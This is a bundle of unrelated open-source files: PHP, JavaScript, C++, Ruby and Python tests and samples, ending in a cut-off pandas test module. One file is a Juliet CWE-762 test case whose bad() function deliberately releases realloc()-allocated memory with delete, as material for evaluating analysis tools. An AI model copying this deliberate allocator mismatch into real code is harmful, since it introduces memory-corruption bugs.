    public function actionUpdate()
    {
        $model = Profile::findByUserId(Yii::$app->user->id);
        if ($model->load(Yii::$app->request->post())) {
            if ($model->validate()) {
                if ($model->save(false)) {
                    Yii::$app->session->setFlash('success', Module::t('users', 'FRONTEND_FLASH_SUCCES_UPDATE'));
                } else {
                    Yii::$app->session->setFlash('danger', Module::t('users', 'FRONTEND_FLASH_FAIL_UPDATE'));
                }
                return $this->refresh();
            } elseif (Yii::$app->request->isAjax) {
                Yii::$app->response->format = Response::FORMAT_JSON;
                return ActiveForm::validate($model);
            }
        }
        return $this->render(
            'update',
            [
                'model' => $model
            ]
        );
    }
}
| MovieDogBall/Testwork | vendor/core/yii2-users-module/controllers/frontend/UserController.php | PHP | bsd-3-clause | 4,168 |
'use strict';
const assert = require('assert');
const { Observable } = require('rx-lite');
/**
 * Subscribes to `observable` expecting it to fail, and hands the error to
 * `fn` for inspection. The returned promise rejects when the observable
 * completes without erroring (the sentinel comparison fails) or when `fn`
 * itself throws.
 *
 * @param {Rx.Observable} observable stream that is expected to emit an error
 * @param {function} fn assertion callback invoked with the caught error
 * @returns {Rx.IPromise<void>}
 */
function checkError(observable, fn) {
  const SENTINEL = {};
  const recovered = observable.catch(error => {
    fn(error);
    return Observable.just(SENTINEL);
  });
  return recovered.toPromise().then(lastValue => {
    assert.deepStrictEqual(lastValue, SENTINEL);
  });
}
module.exports = checkError;
| groupon/shared-store | test/check-error.js | JavaScript | bsd-3-clause | 468 |
/* TEMPLATE GENERATED TESTCASE FILE
Filename: CWE762_Mismatched_Memory_Management_Routines__delete_long_realloc_12.cpp
Label Definition File: CWE762_Mismatched_Memory_Management_Routines__delete.label.xml
Template File: sources-sinks-12.tmpl.cpp
*/
/*
* @description
* CWE: 762 Mismatched Memory Management Routines
* BadSource: realloc Allocate data using realloc()
* GoodSource: Allocate data using new
* Sinks:
* GoodSink: Deallocate data using free()
* BadSink : Deallocate data using delete
* Flow Variant: 12 Control flow: if(globalReturnsTrueOrFalse())
* */
#include "std_testcase.h"
namespace CWE762_Mismatched_Memory_Management_Routines__delete_long_realloc_12
{
#ifndef OMITBAD
/* "bad" variant: the CWE-762 flaw under test. Each branch is chosen at
 * random, so memory allocated with realloc() may be released with delete.
 * The mismatch is INTENTIONAL testcase material — do not "fix" it;
 * analysis tools are expected to flag it. */
void bad()
{
    long * data;
    /* Initialize data*/
    data = NULL;
    if(globalReturnsTrueOrFalse())
    {
        data = NULL;
        /* POTENTIAL FLAW: Allocate memory with a function that requires free() to free the memory */
        data = (long *)realloc(data, 100*sizeof(long));
        if (data == NULL) {exit(-1);}
    }
    else
    {
        /* FIX: Allocate memory from the heap using new */
        data = new long;
    }
    if(globalReturnsTrueOrFalse())
    {
        /* POTENTIAL FLAW: Deallocate memory using delete - the source memory allocation function may
         * require a call to free() to deallocate the memory */
        delete data;
    }
    else
    {
        /* FIX: Deallocate the memory using free() */
        free(data);
    }
}
#endif /* OMITBAD */
#ifndef OMITGOOD
/* goodB2G() - use badsource and goodsink by changing the first "if" so that
   both branches use the BadSource and the second "if" so that both branches
   use the GoodSink. Allocation is always realloc(), deallocation always
   free(), so no mismatch can occur regardless of the random branches. */
static void goodB2G()
{
    long * data;
    /* Initialize data*/
    data = NULL;
    if(globalReturnsTrueOrFalse())
    {
        data = NULL;
        /* POTENTIAL FLAW: Allocate memory with a function that requires free() to free the memory */
        data = (long *)realloc(data, 100*sizeof(long));
        if (data == NULL) {exit(-1);}
    }
    else
    {
        data = NULL;
        /* POTENTIAL FLAW: Allocate memory with a function that requires free() to free the memory */
        data = (long *)realloc(data, 100*sizeof(long));
        if (data == NULL) {exit(-1);}
    }
    if(globalReturnsTrueOrFalse())
    {
        /* FIX: Deallocate the memory using free() */
        free(data);
    }
    else
    {
        /* FIX: Deallocate the memory using free() */
        free(data);
    }
}
/* goodG2B() - use goodsource and badsink by changing the first "if" so that
   both branches use the GoodSource and the second "if" so that both branches
   use the BadSink. Allocation is always new, deallocation always delete,
   so the pairing is consistent regardless of the random branches. */
static void goodG2B()
{
    long * data;
    /* Initialize data*/
    data = NULL;
    if(globalReturnsTrueOrFalse())
    {
        /* FIX: Allocate memory from the heap using new */
        data = new long;
    }
    else
    {
        /* FIX: Allocate memory from the heap using new */
        data = new long;
    }
    if(globalReturnsTrueOrFalse())
    {
        /* POTENTIAL FLAW: Deallocate memory using delete - the source memory allocation function may
         * require a call to free() to deallocate the memory */
        delete data;
    }
    else
    {
        /* POTENTIAL FLAW: Deallocate memory using delete - the source memory allocation function may
         * require a call to free() to deallocate the memory */
        delete data;
    }
}
/* Runs both "good" control-flow variants; neither can produce an
 * allocator/deallocator mismatch. */
void good()
{
    goodB2G();
    goodG2B();
}
#endif /* OMITGOOD */
} /* close namespace */
/* Below is the main(). It is only used when building this testcase on
its own for testing or for building a binary to use in testing binary
analysis tools. It is not used when compiling all the testcases as one
application, which is how source code analysis tools are tested. */
#ifdef INCLUDEMAIN
using namespace CWE762_Mismatched_Memory_Management_Routines__delete_long_realloc_12; /* so that we can use good and bad easily */
/* Standalone driver used when the testcase is built on its own: runs the
 * good() and bad() variants unless the corresponding OMIT* macro is
 * defined. Randomness is seeded so the random branch choices differ
 * between runs. */
int main(int argc, char * argv[])
{
    /* seed randomness */
    srand( (unsigned)time(NULL) );
#ifndef OMITGOOD
    printLine("Calling good()...");
    good();
    printLine("Finished good()");
#endif /* OMITGOOD */
#ifndef OMITBAD
    printLine("Calling bad()...");
    bad();
    printLine("Finished bad()");
#endif /* OMITBAD */
    return 0;
}
#endif
| JianpingZeng/xcc | xcc/test/juliet/testcases/CWE762_Mismatched_Memory_Management_Routines/s04/CWE762_Mismatched_Memory_Management_Routines__delete_long_realloc_12.cpp | C++ | bsd-3-clause | 4,494 |
/////////////////////////////////////////////////////////////////////////////
// Program: wxWidgets Widgets Sample
// Name: fontpicker.cpp
// Purpose: Shows wxFontPickerCtrl
// Author: Francesco Montorsi
// Created: 20/6/2006
// Copyright: (c) 2006 Francesco Montorsi
// Licence: wxWindows licence
/////////////////////////////////////////////////////////////////////////////
// ============================================================================
// declarations
// ============================================================================
// ----------------------------------------------------------------------------
// headers
// ----------------------------------------------------------------------------
// for compilers that support precompilation, includes "wx/wx.h".
#include "wx/wxprec.h"
#if wxUSE_FONTPICKERCTRL
// for all others, include the necessary headers
#ifndef WX_PRECOMP
#include "wx/app.h"
#include "wx/log.h"
#include "wx/radiobox.h"
#endif
#include "wx/artprov.h"
#include "wx/sizer.h"
#include "wx/stattext.h"
#include "wx/checkbox.h"
#include "wx/imaglist.h"
#include "wx/fontpicker.h"
#include "widgets.h"
#include "icons/fontpicker.xpm"
// ----------------------------------------------------------------------------
// constants
// ----------------------------------------------------------------------------
// control ids
// Window IDs for the controls created by this page.
enum
{
    PickerPage_Reset = wxID_HIGHEST, // the "Reset" button
    PickerPage_Font                  // the wxFontPickerCtrl itself
};
// ----------------------------------------------------------------------------
// FontPickerWidgetsPage
// ----------------------------------------------------------------------------
// Widgets-sample page demonstrating wxFontPickerCtrl: shows the picker next
// to checkboxes that toggle its style flags, recreating the control when a
// flag changes.
class FontPickerWidgetsPage : public WidgetsPage
{
public:
    FontPickerWidgetsPage(WidgetsBookCtrl *book, wxImageList *imaglist);
    virtual wxWindow *GetWidget() const wxOVERRIDE { return m_fontPicker; }
    virtual void RecreateWidget() wxOVERRIDE { RecreatePicker(); }
    // lazy creation of the content
    virtual void CreateContent() wxOVERRIDE;
protected:
    // called only once at first construction
    void CreatePicker();
    // called to recreate an existing control
    void RecreatePicker();
    // restore the checkboxes state to the initial values
    void Reset();
    // event handlers (wired up in the event table)
    void OnFontChange(wxFontPickerEvent &ev);
    void OnCheckBox(wxCommandEvent &ev);
    void OnButtonReset(wxCommandEvent &ev);
    // the picker
    wxFontPickerCtrl *m_fontPicker;
    // other controls
    // --------------
    wxCheckBox *m_chkFontTextCtrl,
               *m_chkFontDescAsLabel,
               *m_chkFontUseFontForLabel;
    wxBoxSizer *m_sizer;
private:
    wxDECLARE_EVENT_TABLE();
    DECLARE_WIDGETS_PAGE(FontPickerWidgetsPage)
};
// ----------------------------------------------------------------------------
// event tables
// ----------------------------------------------------------------------------
// Route the reset button, picker change and checkbox toggles to handlers.
wxBEGIN_EVENT_TABLE(FontPickerWidgetsPage, WidgetsPage)
    EVT_BUTTON(PickerPage_Reset, FontPickerWidgetsPage::OnButtonReset)
    EVT_FONTPICKER_CHANGED(PickerPage_Font, FontPickerWidgetsPage::OnFontChange)
    EVT_CHECKBOX(wxID_ANY, FontPickerWidgetsPage::OnCheckBox)
wxEND_EVENT_TABLE()
// ============================================================================
// implementation
// ============================================================================
#if defined(__WXGTK20__)
#define FAMILY_CTRLS NATIVE_CTRLS
#else
#define FAMILY_CTRLS GENERIC_CTRLS
#endif
IMPLEMENT_WIDGETS_PAGE(FontPickerWidgetsPage, "FontPicker",
PICKER_CTRLS | FAMILY_CTRLS);
// The real UI is built lazily in CreateContent(); the constructor only
// forwards to the base class, which registers the page and its icon.
FontPickerWidgetsPage::FontPickerWidgetsPage(WidgetsBookCtrl *book,
                                             wxImageList *imaglist)
                      : WidgetsPage(book, imaglist, fontpicker_xpm)
{
}
// Builds the page layout: a left pane with the style checkboxes and the
// Reset button, and a right pane holding the picker between two stretch
// spacers (so RecreatePicker() can swap it at sizer index 1).
void FontPickerWidgetsPage::CreateContent()
{
    // left pane
    wxSizer *boxleft = new wxBoxSizer(wxVERTICAL);
    wxStaticBoxSizer *fontbox = new wxStaticBoxSizer(wxVERTICAL, this, "&FontPicker style");
    m_chkFontTextCtrl = CreateCheckBoxAndAddToSizer(fontbox, "With textctrl");
    m_chkFontDescAsLabel = CreateCheckBoxAndAddToSizer(fontbox, "Font desc as btn label");
    m_chkFontUseFontForLabel = CreateCheckBoxAndAddToSizer(fontbox, "Use font for label");
    boxleft->Add(fontbox, 0, wxALL|wxGROW, 5);
    boxleft->Add(new wxButton(this, PickerPage_Reset, "&Reset"),
                 0, wxALIGN_CENTRE_HORIZONTAL | wxALL, 15);
    Reset(); // set checkboxes state
    // create pickers
    m_fontPicker = NULL;
    CreatePicker();
    // right pane
    m_sizer = new wxBoxSizer(wxVERTICAL);
    m_sizer->Add(1, 1, 1, wxGROW | wxALL, 5); // spacer
    m_sizer->Add(m_fontPicker, 0, wxALIGN_CENTER|wxALL, 5);
    m_sizer->Add(1, 1, 1, wxGROW | wxALL, 5); // spacer
    // global pane
    wxSizer *sz = new wxBoxSizer(wxHORIZONTAL);
    sz->Add(boxleft, 0, wxGROW|wxALL, 5);
    sz->Add(m_sizer, 1, wxGROW|wxALL, 5);
    SetSizer(sz);
}
// (Re)creates m_fontPicker with the style flags selected by the
// checkboxes. Deleting the previous instance first is safe: m_fontPicker
// is NULL on the first call (set in CreateContent()).
void FontPickerWidgetsPage::CreatePicker()
{
    delete m_fontPicker;
    // start from the page's default flags, then add the user's choices
    long style = GetAttrs().m_defaultFlags;
    if ( m_chkFontTextCtrl->GetValue() )
        style |= wxFNTP_USE_TEXTCTRL;
    if ( m_chkFontUseFontForLabel->GetValue() )
        style |= wxFNTP_USEFONT_FOR_LABEL;
    if ( m_chkFontDescAsLabel->GetValue() )
        style |= wxFNTP_FONTDESC_AS_LABEL;
    m_fontPicker = new wxFontPickerCtrl(this, PickerPage_Font,
                                        *wxSWISS_FONT,
                                        wxDefaultPosition, wxDefaultSize,
                                        style);
}
// Swaps the picker inside the right-pane sizer: detach the item at index 1
// (between the two stretch spacers), rebuild the control, re-insert it at
// the same position and relayout.
void FontPickerWidgetsPage::RecreatePicker()
{
    m_sizer->Remove(1);
    CreatePicker();
    m_sizer->Insert(1, m_fontPicker, 0, wxALIGN_CENTER|wxALL, 5);
    m_sizer->Layout();
}
// Restores the style checkboxes to the flags of wxFNTP_DEFAULT_STYLE.
void FontPickerWidgetsPage::Reset()
{
    const long defaults = wxFNTP_DEFAULT_STYLE;
    m_chkFontTextCtrl->SetValue((defaults & wxFNTP_USE_TEXTCTRL) != 0);
    m_chkFontUseFontForLabel->SetValue((defaults & wxFNTP_USEFONT_FOR_LABEL) != 0);
    m_chkFontDescAsLabel->SetValue((defaults & wxFNTP_FONTDESC_AS_LABEL) != 0);
}
// ----------------------------------------------------------------------------
// event handlers
// ----------------------------------------------------------------------------
// "Reset" button handler: restore default checkbox state, then rebuild the
// picker so it reflects the defaults.
void FontPickerWidgetsPage::OnButtonReset(wxCommandEvent& WXUNUSED(event))
{
    Reset();
    RecreatePicker();
}
// Logs the newly selected font whenever the picker's value changes.
void FontPickerWidgetsPage::OnFontChange(wxFontPickerEvent& event)
{
    wxLogMessage("The font changed to '%s' with size %d !",
                 event.GetFont().GetFaceName(), event.GetFont().GetPointSize());
}
// Rebuilds the picker when any of the three style checkboxes is toggled;
// other checkbox events (wxID_ANY binding) are ignored.
void FontPickerWidgetsPage::OnCheckBox(wxCommandEvent &event)
{
    wxObject* const source = event.GetEventObject();
    const bool isStyleToggle = source == m_chkFontTextCtrl ||
                               source == m_chkFontDescAsLabel ||
                               source == m_chkFontUseFontForLabel;
    if ( isStyleToggle )
        RecreatePicker();
}
#endif // wxUSE_FONTPICKERCTRL
| ric2b/Vivaldi-browser | update_notifier/thirdparty/wxWidgets/samples/widgets/fontpicker.cpp | C++ | bsd-3-clause | 6,890 |
require 'mxx_ru/cpp'
# Mxx_ru project definition: builds the demand_queue_2_bench_1
# microbenchmark as an executable.
MxxRu::Cpp::exe_target {
  # Depends on the ACE DLL build project.
  required_prj "ace/dll.rb"
  # Name of the resulting binary.
  target "_microbench.demand_queue_2_bench_1"
  cpp_source "main.cpp"
}
| Free4Lila/s-objectizer | so_5/5.2.4-microbenchmarking/dev/microbenchmarks/so_5/demand_queue_2_bench_1/prj.rb | Ruby | bsd-3-clause | 147 |
#include "ClangInvoker.h"
#include "ThreadExecutor.h"
#include "windycode/Support.h"
#include <unistd.h>
#include "gtest/gtest.h"
namespace windycode {
namespace clang {
namespace {
// Deleter for malloc()-allocated C strings (e.g. the buffer returned by
// getcwd(nullptr, 0)), for use with std::unique_ptr.
class CharDeleter {
public:
  void operator()(char *p) { free(p); }
};
// Lazily computes and caches the path "<parent-of-cwd>/unittests".
// Returns the empty string when that directory does not exist.
static std::string getUnittestPath() {
  static std::string Path;
  static bool Initialized = false;
  if (!Initialized) {
    Initialized = true;
    std::unique_ptr<char, CharDeleter> CurrentPath(getcwd(nullptr, 0));
    Path = parentPath(CurrentPath.get());
    appendPath(Path, "unittests");
    // BUG FIX: previously an early `return std::string()` left the invalid
    // path cached, so only the *first* call reported failure and every
    // subsequent call returned the bogus path. Clear the cache instead so
    // all calls consistently return "".
    if (!isDirectory(Path))
      Path.clear();
  }
  return Path;
}
// Builds the full path of a file inside the unittests directory, or the
// empty string when the directory could not be located.
static std::string getUnittestFilePath(string_ref FileName) {
  std::string Result = getUnittestPath();
  if (!Result.empty())
    appendPath(Result, FileName);
  return Result;
}
// The invoker must be a process-wide singleton: repeated getInstance()
// calls return the same non-null pointer.
TEST(ClangInvokerTest, Singleton) {
  ClangInvoker *Instance = ClangInvoker::getInstance();
  ASSERT_NE(Instance, nullptr);
  ASSERT_EQ(Instance, ClangInvoker::getInstance());
}
// Sanity check that the unittests directory can be located relative to the
// working directory. NOTE(review): the test name misspells "Unitest";
// renaming would change the gtest filter string, so it is only noted here.
TEST(ClangInvokerTest, GetUnitestDirectory) {
  ASSERT_FALSE(getUnittestPath().empty());
}
// getClangInfo() should populate the struct without crashing; the contents
// are not inspected by this test.
TEST(ClangInvokerTest, ClangInfo) {
  ClangInfo Info;
  ClangInvoker *Instance = ClangInvoker::getInstance();
  Instance->getClangInfo(&Info);
}
// Opening a bare relative name fails; opening the resolved unittest path
// succeeds and the file can be closed again. sync() drains the worker
// thread before the next test runs.
TEST(ClangInvokerTest, OpenAndCloseFile) {
  ClangInvoker *Instance = ClangInvoker::getInstance();
  std::string FileName = getUnittestFilePath("test01.c");
  ASSERT_FALSE(Instance->openFile("test01.c").ok());
  ASSERT_TRUE(Instance->openFile(FileName).ok());
  EXPECT_TRUE(Instance->closeFile(FileName).ok());
  ThreadExecutor::sync();
}
// test02.c is expected to contain code that produces at least one
// diagnostic; the detailed category check is currently disabled.
TEST(ClangInvokerTest, getDiagnostics) {
  ClangInvoker *Instance = ClangInvoker::getInstance();
  google::protobuf::RepeatedPtrField<Diagnostic> DSet;
  std::string FileName = getUnittestFilePath("test02.c");
  ASSERT_TRUE(Instance->openFile(FileName).ok());
  ASSERT_TRUE(Instance->getDiagnosticSet(FileName, &DSet).ok());
  EXPECT_NE(0, DSet.size());
  // EXPECT_NE(0u, DSet[0]->category());
  EXPECT_TRUE(Instance->closeFile(FileName).ok());
  ThreadExecutor::sync();
}
// FIXME
// Disable codeCompletAt on linux since we haven't add support for gcc builtin
// headers' finding
#ifndef CH_OS_LINUX
// Completion at the start of test02.c yields global results; completing at
// line 5 column 7 should report candidates whose replacement starts at
// column 3. The exact-candidate check is currently disabled.
TEST(ClangInvokerTest, codeCompleteAt) {
  ClangInvoker *Instance = ClangInvoker::getInstance();
  unsigned StartColumn;
  google::protobuf::RepeatedPtrField<CompletionData> Completions;
  std::string FileName = getUnittestFilePath("test02.c");
  SourceLocation Location;
  Location.set_file_name(FileName);
  Location.set_line(1);
  Location.set_column(1);
  ASSERT_TRUE(Instance->openFile(FileName).ok());
  ASSERT_TRUE(
      Instance->codeCompleteAt(Location, &StartColumn, &Completions).ok());
  EXPECT_NE(0, Completions.size());
  Location.set_line(5);
  Location.set_column(7);
  ASSERT_TRUE(
      Instance->codeCompleteAt(Location, &StartColumn, &Completions).ok());
  ASSERT_NE(0, Completions.size());
  EXPECT_EQ(3u, StartColumn);
  // const auto &Completion = Completions.front();
  // EXPECT_STREQ("print", Completion.Text().c_str());
  EXPECT_TRUE(Instance->closeFile(FileName).ok());
  ThreadExecutor::sync();
}
#endif
// go-to-definition in test03.c: the file must be diagnostic-free, then
// several reference positions (including positions inside the identifier)
// must all resolve to the expected declaration locations.
TEST(ClangInvokerTest, getDefinition) {
  ClangInvoker *Instance = ClangInvoker::getInstance();
  google::protobuf::RepeatedPtrField<Diagnostic> Diags;
  std::string FileName = getUnittestFilePath("test03.c");
  ASSERT_TRUE(Instance->openFile(FileName).ok());
  ASSERT_TRUE(Instance->getDiagnosticSet(FileName, &Diags).ok());
  ASSERT_EQ(0, Diags.size());
  SourceLocation Location, SrcLocation;
  Location.set_file_name(FileName);
  Location.set_line(6);
  Location.set_column(10);
  ASSERT_TRUE(Instance->getDefinition(Location, &SrcLocation).ok());
  EXPECT_EQ(1u, SrcLocation.line());
  EXPECT_EQ(8u, SrcLocation.column());
  Location.set_line(7);
  Location.set_column(16);
  ASSERT_TRUE(Instance->getDefinition(Location, &SrcLocation).ok());
  EXPECT_EQ(6u, SrcLocation.line());
  EXPECT_EQ(12u, SrcLocation.column());
  // columns 16-18 all fall on the same token and must resolve identically
  Location.set_line(7);
  Location.set_column(17);
  ASSERT_TRUE(Instance->getDefinition(Location, &SrcLocation).ok());
  EXPECT_EQ(6u, SrcLocation.line());
  EXPECT_EQ(12u, SrcLocation.column());
  Location.set_line(7);
  Location.set_column(18);
  ASSERT_TRUE(Instance->getDefinition(Location, &SrcLocation).ok());
  EXPECT_EQ(6u, SrcLocation.line());
  EXPECT_EQ(12u, SrcLocation.column());
  EXPECT_TRUE(Instance->closeFile(FileName).ok());
  ThreadExecutor::sync();
}
// getCursorDetail() must succeed for a position in test04.c; the detailed
// field/comment assertions are currently disabled and kept for reference.
TEST(ClangInvokerTest, getCursorDetail) {
  ClangInvoker *Instance = ClangInvoker::getInstance();
  CursorDetail Detail;
  std::string FileName = getUnittestFilePath("test04.c");
  ASSERT_TRUE(Instance->openFile(FileName).ok());
  SourceLocation Location;
  Location.set_file_name(FileName);
  Location.set_line(3);
  Location.set_column(8);
  ASSERT_TRUE(Instance->getCursorDetail(Location, &Detail).ok());
  // EXPECT_FALSE(Detail.type().empty());
  // EXPECT_FALSE(Detail.kind().empty());
  // EXPECT_FALSE(Detail.canonicalType().empty());
  // EXPECT_FALSE(Detail.spellingName().empty());
  // EXPECT_FALSE(Detail.rawComment().empty());
  // EXPECT_EQ("/// \\brief hello\n/// this is a comment", Detail.rawComment());
  // EXPECT_FALSE(Detail.briefComment().empty());
  // EXPECT_EQ("hello this is a comment", Detail.briefComment());
  // EXPECT_FALSE(Detail.xmlComment().empty());
  // ASSERT_TRUE(
  //     Instance->getCursorDetail(FileName, 3, 10, &Detail).ok());
  // EXPECT_EQ("/// \\brief hello\n/// this is a comment", Detail.rawComment());
  // EXPECT_EQ("hello this is a comment", Detail.briefComment());
  // ASSERT_TRUE(
  //     Instance->getCursorDetail(FileName, 3, 12, &Detail).ok());
  // EXPECT_EQ("/// \\brief hello\n/// this is a comment", Detail.rawComment());
  // EXPECT_EQ("hello this is a comment", Detail.briefComment());
  EXPECT_TRUE(Instance->closeFile(FileName).ok());
  ThreadExecutor::sync();
}
// Comment extraction in test05.cc: currently only the first position is
// actively checked; the remaining positions are disabled pending the API
// change from (file, line, column) to SourceLocation.
TEST(ClangInvokerTest, getCursorDetailComments) {
  ClangInvoker *Instance = ClangInvoker::getInstance();
  CursorDetail Detail;
  SourceLocation Location;
  std::string FileName = getUnittestFilePath("test05.cc");
  ASSERT_TRUE(Instance->openFile(FileName).ok());
  Location.set_file_name(FileName);
  Location.set_line(3);
  Location.set_column(7);
  ASSERT_TRUE(Instance->getCursorDetail(Location, &Detail).ok());
  // EXPECT_FALSE(Detail.rawComment().empty() ||
  //              Detail.briefComment().empty() ||
  //              Detail.xmlComment().empty());
  // ASSERT_TRUE(
  //     Instance->getCursorDetail(FileName, 7, 10, &Detail).ok());
  // EXPECT_FALSE(Detail.rawComment().empty() ||
  //              Detail.briefComment().empty() ||
  //              Detail.xmlComment().empty());
  // ASSERT_TRUE(
  //     Instance->getCursorDetail(FileName, 10, 10, &Detail).ok());
  // EXPECT_FALSE(Detail.rawComment().empty() ||
  //              Detail.briefComment().empty() ||
  //              Detail.xmlComment().empty());
  // ASSERT_TRUE(
  //     Instance->getCursorDetail(FileName, 15, 7, &Detail).ok());
  // EXPECT_FALSE(Detail.rawComment().empty() ||
  //              Detail.briefComment().empty() ||
  //              Detail.xmlComment().empty());
  // ASSERT_TRUE(
  //     Instance->getCursorDetail(FileName, 17, 6, &Detail));
  // EXPECT_FALSE(Detail.rawComment().empty() ||
  //              Detail.briefComment().empty() ||
  //              Detail.xmlComment().empty());
  // ASSERT_TRUE(
  //     Instance->getCursorDetail(FileName, 18, 5, &Detail));
  // EXPECT_FALSE(Detail.rawComment().empty() ||
  //              Detail.briefComment().empty() ||
  //              Detail.xmlComment().empty());
  // ASSERT_TRUE(
  //     Instance->getCursorDetail(FileName, 19, 5, &Detail));
  // EXPECT_FALSE(Detail.rawComment().empty() ||
  //              Detail.briefComment().empty() ||
  //              Detail.xmlComment().empty());
  // ASSERT_TRUE(
  //     Instance->getCursorDetail(FileName, 20, 3, &Detail));
  // EXPECT_FALSE(Detail.rawComment().empty() ||
  //              Detail.briefComment().empty() ||
  //              Detail.xmlComment().empty());
  EXPECT_TRUE(Instance->closeFile(FileName).ok());
  ThreadExecutor::sync();
}
} // anonymous namespace
} // namespace clang
} // namespace windycode
| Chilledheart/windycode | src/ClangSupport/ClangInvoker_unittest.cc | C++ | bsd-3-clause | 8,378 |
from datetime import datetime
import inspect
import numpy as np
import pytest
from pandas.core.dtypes.common import (
is_categorical_dtype,
is_interval_dtype,
is_object_dtype,
)
from pandas import (
Categorical,
DataFrame,
DatetimeIndex,
Index,
IntervalIndex,
Series,
Timestamp,
cut,
date_range,
to_datetime,
)
import pandas._testing as tm
class TestDataFrameAlterAxes:
    """Tests for altering DataFrame axes: direct assignment to ``index`` and
    ``columns``, timezone-aware DatetimeIndex/Series conversions, set_index
    round trips, and the rename/reindex API surface."""

    def test_set_index_directly(self, float_string_frame):
        # assigning an Index of the right length replaces the index;
        # a wrong-length assignment must raise
        df = float_string_frame
        idx = Index(np.arange(len(df))[::-1])
        df.index = idx
        tm.assert_index_equal(df.index, idx)
        with pytest.raises(ValueError, match="Length mismatch"):
            df.index = idx[::2]

    def test_convert_dti_to_series(self):
        # don't cast a DatetimeIndex WITH a tz, leave as object
        # GH 6032
        idx = DatetimeIndex(
            to_datetime(["2013-1-1 13:00", "2013-1-2 14:00"]), name="B"
        ).tz_localize("US/Pacific")
        df = DataFrame(np.random.randn(2, 1), columns=["A"])
        expected = Series(
            np.array(
                [
                    Timestamp("2013-01-01 13:00:00-0800", tz="US/Pacific"),
                    Timestamp("2013-01-02 14:00:00-0800", tz="US/Pacific"),
                ],
                dtype="object",
            ),
            name="B",
        )
        # convert index to series
        result = Series(idx)
        tm.assert_series_equal(result, expected)
        # assign to frame
        df["B"] = idx
        result = df["B"]
        tm.assert_series_equal(result, expected)
        # convert to series while keeping the timezone
        # (keep_tz is deprecated and must warn)
        msg = "stop passing 'keep_tz'"
        with tm.assert_produces_warning(FutureWarning) as m:
            result = idx.to_series(keep_tz=True, index=[0, 1])
        tm.assert_series_equal(result, expected)
        assert msg in str(m[0].message)
        # convert to utc
        with tm.assert_produces_warning(FutureWarning) as m:
            df["B"] = idx.to_series(keep_tz=False, index=[0, 1])
        result = df["B"]
        comp = Series(DatetimeIndex(expected.values).tz_localize(None), name="B")
        tm.assert_series_equal(result, comp)
        msg = "do 'idx.tz_convert(None)' before calling"
        assert msg in str(m[0].message)
        result = idx.to_series(index=[0, 1])
        tm.assert_series_equal(result, expected)
        with tm.assert_produces_warning(FutureWarning) as m:
            result = idx.to_series(keep_tz=False, index=[0, 1])
        tm.assert_series_equal(result, expected.dt.tz_convert(None))
        msg = "do 'idx.tz_convert(None)' before calling"
        assert msg in str(m[0].message)
        # list of datetimes with a tz
        df["B"] = idx.to_pydatetime()
        result = df["B"]
        tm.assert_series_equal(result, expected)
        # GH 6785
        # set the index manually
        import pytz

        df = DataFrame([{"ts": datetime(2014, 4, 1, tzinfo=pytz.utc), "foo": 1}])
        expected = df.set_index("ts")
        df.index = df["ts"]
        df.pop("ts")
        tm.assert_frame_equal(df, expected)

    def test_set_columns(self, float_string_frame):
        # same contract as test_set_index_directly, but for columns
        cols = Index(np.arange(len(float_string_frame.columns)))
        float_string_frame.columns = cols
        with pytest.raises(ValueError, match="Length mismatch"):
            float_string_frame.columns = cols[::2]

    def test_dti_set_index_reindex(self):
        # GH 6631
        df = DataFrame(np.random.random(6))
        idx1 = date_range("2011/01/01", periods=6, freq="M", tz="US/Eastern")
        idx2 = date_range("2013", periods=6, freq="A", tz="Asia/Tokyo")
        df = df.set_index(idx1)
        tm.assert_index_equal(df.index, idx1)
        df = df.reindex(idx2)
        tm.assert_index_equal(df.index, idx2)
        # GH 11314
        # with tz
        index = date_range(
            datetime(2015, 10, 1), datetime(2015, 10, 1, 23), freq="H", tz="US/Eastern"
        )
        df = DataFrame(np.random.randn(24, 1), columns=["a"], index=index)
        new_index = date_range(
            datetime(2015, 10, 2), datetime(2015, 10, 2, 23), freq="H", tz="US/Eastern"
        )
        result = df.set_index(new_index)
        assert result.index.freq == index.freq

    # Renaming

    def test_reindex_api_equivalence(self):
        # equivalence of the labels/axis and index/columns API's
        df = DataFrame(
            [[1, 2, 3], [3, 4, 5], [5, 6, 7]],
            index=["a", "b", "c"],
            columns=["d", "e", "f"],
        )
        res1 = df.reindex(["b", "a"])
        res2 = df.reindex(index=["b", "a"])
        res3 = df.reindex(labels=["b", "a"])
        res4 = df.reindex(labels=["b", "a"], axis=0)
        res5 = df.reindex(["b", "a"], axis=0)
        for res in [res2, res3, res4, res5]:
            tm.assert_frame_equal(res1, res)
        res1 = df.reindex(columns=["e", "d"])
        res2 = df.reindex(["e", "d"], axis=1)
        res3 = df.reindex(labels=["e", "d"], axis=1)
        for res in [res2, res3]:
            tm.assert_frame_equal(res1, res)
        res1 = df.reindex(index=["b", "a"], columns=["e", "d"])
        res2 = df.reindex(columns=["e", "d"], index=["b", "a"])
        res3 = df.reindex(labels=["b", "a"], axis=0).reindex(labels=["e", "d"], axis=1)
        for res in [res2, res3]:
            tm.assert_frame_equal(res1, res)

    def test_assign_columns(self, float_frame):
        # renaming columns must not change the underlying data
        float_frame["hi"] = "there"
        df = float_frame.copy()
        df.columns = ["foo", "bar", "baz", "quux", "foo2"]
        tm.assert_series_equal(float_frame["C"], df["baz"], check_names=False)
        tm.assert_series_equal(float_frame["hi"], df["foo2"], check_names=False)

    def test_set_index_preserve_categorical_dtype(self):
        # GH13743, GH13854
        df = DataFrame(
            {
                "A": [1, 2, 1, 1, 2],
                "B": [10, 16, 22, 28, 34],
                "C1": Categorical(list("abaab"), categories=list("bac"), ordered=False),
                "C2": Categorical(list("abaab"), categories=list("bac"), ordered=True),
            }
        )
        for cols in ["C1", "C2", ["A", "C1"], ["A", "C2"], ["C1", "C2"]]:
            result = df.set_index(cols).reset_index()
            result = result.reindex(columns=df.columns)
            tm.assert_frame_equal(result, df)

    def test_rename_signature(self):
        # guard against accidental signature changes
        sig = inspect.signature(DataFrame.rename)
        parameters = set(sig.parameters)
        assert parameters == {
            "self",
            "mapper",
            "index",
            "columns",
            "axis",
            "inplace",
            "copy",
            "level",
            "errors",
        }

    def test_reindex_signature(self):
        # guard against accidental signature changes
        sig = inspect.signature(DataFrame.reindex)
        parameters = set(sig.parameters)
        assert parameters == {
            "self",
            "labels",
            "index",
            "columns",
            "axis",
            "limit",
            "copy",
            "level",
            "method",
            "fill_value",
            "tolerance",
        }
class TestIntervalIndex:
    def test_setitem(self):
        """Assigning interval-categorical data: Series/``.values`` assignment
        keeps the categorical dtype, while plain ndarray assignment decays
        to object dtype."""
